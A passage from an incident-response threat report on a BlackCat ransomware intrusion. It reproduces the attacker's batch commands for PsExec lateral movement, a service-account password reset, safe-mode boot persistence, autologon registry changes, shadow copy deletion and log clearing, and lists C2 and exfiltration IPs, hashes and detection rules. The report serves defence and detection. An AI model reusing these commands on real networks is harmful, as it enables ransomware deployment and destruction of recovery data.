remotely using PsExec on targeted servers to perform various operations.

The up.bat script was executed remotely on a domain controller using the
following command:

cmd.exe /C PsExec64.exe -accepteula \\<DOMAIN-CONTROLLER-IP> -c -f -d -s up.bat


The script contained a one liner to reset the password to a privileged service
account:

net  user REDACTED JapanNight!128 /domain


The threat actor executed the following command to remotely copy the ransomware
binary to the target machines before running the second batch script:

cmd.exe /C for /f %a in (pc.txt) do copy /y \\<REDACTED>\c$\<REDACTED>.exe \\%a\c$\<REDACTED>.exe


The second script, 1.bat, was then executed on multiple hosts using the
following command:

cmd.exe /C PsExec64.exe -accepteula @pc.txt -c -f -d -h 1.bat


The script contained the following commands:

bcdedit  /set {default} safeboot network 
findstr  /C:"The operation completed successfully." 
reg  add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d "cmd.exe /c C:\<REDACTED-COMPANY-NAME>.exe" /f 
findstr  /C:"The operation completed successfully." 
reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d <REDACTED-DOMAIN-NAME>\backup2 /f
reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d JapanNight!128 /f
reg  add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
timeout  /T 10
shutdown  -r -t 0


The above commands were meant to preform the following operations:

 * The first command uses bcdedit utility to modify and set the default boot
   configuration of the system to the “safe mode with networking”.
 * The second command is using findstr to check if the previous command executed
   successfully.
 * The following reg commands are used to modify the registry and enable
   automatic logon using the service account, and add the ransomware binary
   <REDACTED-COMPANY-NAME>.exe to
   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce to be executed on
   system’s start up.
 * The last commands are used to initiate an immediate system restart after a 10
   second delay.

The ransomware binary <REDACTED-COMPANY-NAME>.exe executed multiple files and
utilities, below are the child and grand child processes showing the behavior of
this ransomware binary:

C:\<REDACTED-COMPANY-NAME>.exe
----> C:\example.exe C:\example.exe --access-token REDACTED --safeboot-network
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /d Service"
--------> C:\Windows\System32\cmd.exe "cmd" /c "bcdedit /set {current} safeboot network"
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network "
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \"C:\example.exe\""
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network "
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \"C:\example.exe\""
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\example.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network "
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Windows\TEMP\2-REDACTED-51.exe --safeboot-instance --access-token REDACTED --prop-arg-safeboot-network --prop-file \"C:\example.exe\""
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\15991160457623399845550968347370640942 /f"
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\15991160457623399845550968347370640942 /f"
--------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "sc delete 15991160457623399845550968347370640942"
--------> C:\Windows\System32\cmd.exe "cmd" /c "bcdedit /deletevalue {current} safeboot"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "wmic csproduct get UUID"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "iisreset.exe /stop"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"
------------> C:\Windows\System32\cmd.exe "cmd" /c "vssadmin.exe Delete Shadows /all /quiet"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "arp -a"
------------> C:\Windows\System32\cmd.exe "cmd" /c "wmic.exe Shadowcopy Delete"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "wevtutil.exe el"
------------> C:\Windows\SysWOW64\cmd.exe "cmd" /c "wevtutil.exe cl <MULTIPLE EVENT LOGS> (Executed hundreds of times)


The threat actor executed the binary example.exe which configured the
ransomware, cleared logs and deleted volume shadow copies.



The ransomware options were dissected in Netscope’s BlackCat Ransomware: Tactics
and Techniques From a Targeted Attack blog post.

Upon the execution of these utilities, the binary started encrypting files and
dropping the ransom note:




TIMELINE



 


DIAMOND MODEL




INDICATORS


ATOMIC

Sliver
194.49.94[.]18:8443
194.169.175[.]134:8443

Cobalt Strike
91.92.250[.]60:443
91.92.250[.]65:443

Staging Tool Server
91.92.245[.]26:443

Exfiltration Server
195.123.226[.]84:8000



COMPUTED

Version.zip
DBF5F56998705C37076B6CAE5D0BFB4D
E6AB3C595AC703AFD94618D1CA1B8EBCE623B21F
5DC8B08C7E1B11ABF2B6B311CD7E411DB16A7C3827879C6F93BD0DAC7A71D321

wo14.py
EB64862F1C8464CA3D03CF0A4AC608F4
6F43E6388B64998B7AA7411104B955A8949C4C63
726F038C13E4C90976811B462E6D21E10E05F7C11E35331D314C546D91FA6D21

worksliv.py
3A4FDBC642A24A240692F9CA70757E9F
794203A4E18F904F0D244C7B3C2F5126B58F6A21
5F7D438945306BF8A7F35CAB0E2ACC80CDC9295A57798D8165EF6D8B86FBB38D

slv.py
7A4CB8261036F35FD273DA420BF0FD5E
9648559769179677C5B58D5619CA8872F5086312
4EF1009923FC12C2A3127C929E0AA4515C9F4D068737389AFB3464C28CCF5925

work.aes
1BE7FE8E20F8E9FDC6FD6100DCAD38F3
C4CDE794CF4A68D63617458A60BC8B90D99823CA
4EE4E1E2CEDF59A802C01FAE9CCFCFDE3E84764C72E7D95B97992ADDD6EDF527

data.aes
4232C065029EB52D1B4596A08568E800
79818110ABD52BA14800CDFF39ECA3252412B232
3298629DE0489C12E451152E787D294753515855DBF1CE80BFCDED584A84AC62

service_probes
637FB65A1755C4B6DC1E0428E69B634E
FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6

UpdateEG.bat
0B1882F719504799B3211BF73DFDC253
448892D5607124FDD520F62FF0BC972DF801C046
39EC2834494F384028AD17296F70ED6608808084EF403714CFBC1BFBBED263D4

python311.dll
E20FC97E364E859A2FB58D66BC2A1D05
F5F56413F81E8F4A941F53E42A90BA1720823F15
9514035FEA8000A664799E369AE6D3AF6ABFE8E5CDA23CDAFBEDE83051692E63

example.exe
C737A137B66138371133404C38716741
A3E4FB487400D99E3A9F3523AEAA9AF5CF6E128B
25172A046821BD04E74C15DC180572288C67FDFF474BDB5EB11B76DCE1B3DAD3

2-REDACTED-51.exe
7A1E7F652055C812644AD240C41D904A
B39C244C3117F516CE5844B2A843EFF1E839207C
5FAC60F1E97B6EAAE18EBD8B49B912C86233CF77637590F36AA319651582D3C4

domain_name.exe
E0D1CF0ABD09D7632F79A8259283288D
3A78CE27A7AA16A8230668C644C7DF308DE6CF33
D15CAB3901E9A10AF772A0A1BDBF35B357EE121413D4CF542D96819DC4471158



DETECTIONS


NETWORK

ETPRO JA3 Hash - Possible Ligolo Server/Golang Binary Response
ET USER_AGENTS Go HTTP Client User-Agent
ET POLICY SMB2 NT Create AndX Request For an Executable File
ET POLICY SMB Executable File Transfer
ET POLICY PsExec service created
ET RPC DCERPC SVCCTL - Remote Service Control Manager Access
ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement
ET POLICY Powershell Activity Over SMB - Likely Lateral Movement
ET POLICY SMB2 NT Create AndX Request For a .bat File
ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement
ET INFO Suspected Impacket WMIExec Activity
ET INFO Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)
ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection
ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check
ETPRO USER_AGENTS Observed Suspicious UA (Mozilla/5.0)



SIGMA

Search rules on detection.fyi or sigmasearchengine.com

DFIR Public Rules Repo:

DFIR Private Rules:

934fa692-f2fa-4465-8bb3-ee1d4c0718cc : Enabling Safeboot with BCDEDIT
181f510b-0b3c-4e05-939c-7623a4a9c82c : Execution of Python Scripts in AppData Directory
6f77de5c-27af-435b-b530-e2d07b77a980 : Impacket Tool Execution
d2722770-3295-478e-bd58-c3c18baaa821 : Modification of UserInit Registry Value
3f684d2e-4760-4db9-a578-3698e21a01d5 : Modification of UserInit Registry Value
2249fc47-1825-4137-b9ce-aa65749bb68c : Restic Backup Tool Misuse


Sigma Repo:

5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE
968eef52-9cff-4454-8992-1e74b9cbad6c : Reconnaissance Activity
8d5aca11-22b3-4f22-b7ba-90e60533e1fb : Wmiexec Default Output File
526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via Wmic.EXE
7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools
42c575ea-e41e-41f1-b248-8093c3e82a28 : PsExec Service Installation
8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2
192a0330-c20b-4356-90b6-7b7049ae0b8 : Successful Overpass the Hash Attempt
d7662ff6-9e97-4596-a61d-9839e32dee8d : Add SafeBoot Keys Via Reg Utility
cc36992a-4671-4f21-a91d-6c2b72a2edf5 : Suspicious Eventlog Clearing or Configuration Change Activity
c947b146-0abc-4c87-9c64-b17e9d7274a2 : Shadow Copies Deletion Using Operating Systems Utilities
dcd74b95-3f36-4ed9-9598-0490951643aa : PowerView PowerShell Cmdlets - ScriptBlock



YARA

TBD

External Rules:

https://github.com/RussianPanda95/Yara-Rules/blob/main/Nitrogen/mal_nitrogen.yar
https://github.com/RussianPanda95/Yara-Rules/blob/main/Nitrogen/nitrogen_python311.yar
https://github.com/ditekshen/detection/blob/master/yara/malware.yar#L9267-L9289
https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_COFFLoader.yar
 


MITRE ATT&CK



Account Manipulation - T1098                                                                                                                                       
Clear Windows Event Logs - T1070.001                                                                                                                               
Data Encrypted for Impact - T1486                                                                                                                                  
Data from Network Shared Drive - T1039                                                                                                                             
DLL Side-Loading - T1574.002                                                                                                                                       
Domain Groups - T1069.002                                                                                                                                          
Domain Trust Discovery - T1482                                                                                                                                     
Drive-by Compromise - T1189                                                                                                                                        
Dynamic-link Library Injection - T1055.001                                                                                                                         
Encrypted/Encoded File - T1027.013                                                                                                                                 
Exfiltration Over Alternative Protocol - T1048                                                                                                                     
Ingress Tool Transfer - T1105                                                                                                                                      
Inhibit System Recovery - T1490                                                                                                                                    
Lateral Tool Transfer - T1570                                                                                                                                      
Local Account - T1087.001                                                                                                                                          
Local Groups - T1069.001                                                                                                                                           
LSASS Memory - T1003.001                                                                                                                                           
Malicious File - T1204.002                                                                                                                                         
Masquerading - T1036                                                                                                                                               
Match Legitimate Name or Location - T1036.005                                                                                                                      
Network Share Discovery - T1135
PowerShell - T1059.001
Process Injection - T1055
Python - T1059.006
Remote Desktop Protocol - T1021.001
Remote System Discovery - T1018
Safe Mode Boot - T1562.009
Scheduled Task - T1053.005
Service Execution - T1569.002
SMB/Windows Admin Shares - T1021.002
Web Protocols - T1071.001
Windows Command Shell - T1059.003
Windows Management Instrumentation - T1047
Winlogon Helper DLL - T1547.004


Internal case #TB25590 #PR32467


SHARE THIS:

 * Twitter
 * LinkedIn
 * Reddit
 * Facebook
 * WhatsApp
 * 


RELATED

THREAT BRIEF: WORDPRESS PLUGIN EXPLOIT LEADS TO GODZILLA WEB SHELL, DISCOVERY &
NEW CVE

Below is a recent Threat Brief that we shared with our customers. Each year, we
produce over 20 detailed Threat Briefs, which follow a format similar to the
below. Typically, these reports include specific dates and times to provide
comprehensive insights; however, please note that such information has been
redacted…

LETS OPEN(DIR) SOME PRESENTS: AN ANALYSIS OF A PERSISTENT ACTOR’S ACTIVITY

This report is a little different than our typical content. We were able to
analyze data from a perspective we typically don't get to see... a threat
actor's host! In early November, we came across an open directory that included
more than a year of historical threat actor activity. By…

THREAT ACTORS’ TOOLKIT: LEVERAGING SLIVER, POSHC2 & BATCH SCRIPTS

Key Takeaways In early December of 2023, we discovered an open directory filled
with batch scripts, primarily designed for defense evasion and executing command
and control payloads. These scripts execute various actions, including disabling
antivirus processes and stopping services related to SQL, Hyper-V, security
tools, and Exchange servers. This report…




POST NAVIGATION

BlackSuit Ransomware
Search for:

Powered by Google Übersetzer

Type your email…

Subscribe

REGISTER FOR OUR NEXT CTF


REPORTS


THREAT INTELLIGENCE


DETECTION RULES


DFIR LABS


MENTORING AND COACHING


Proudly powered by WordPress | Copyright 2023 | The DFIR Report | All Rights
Reserved

Go Top
Originaltext

Diese Übersetzung bewerten
Mit deinem Feedback können wir Google Übersetzer weiter verbessern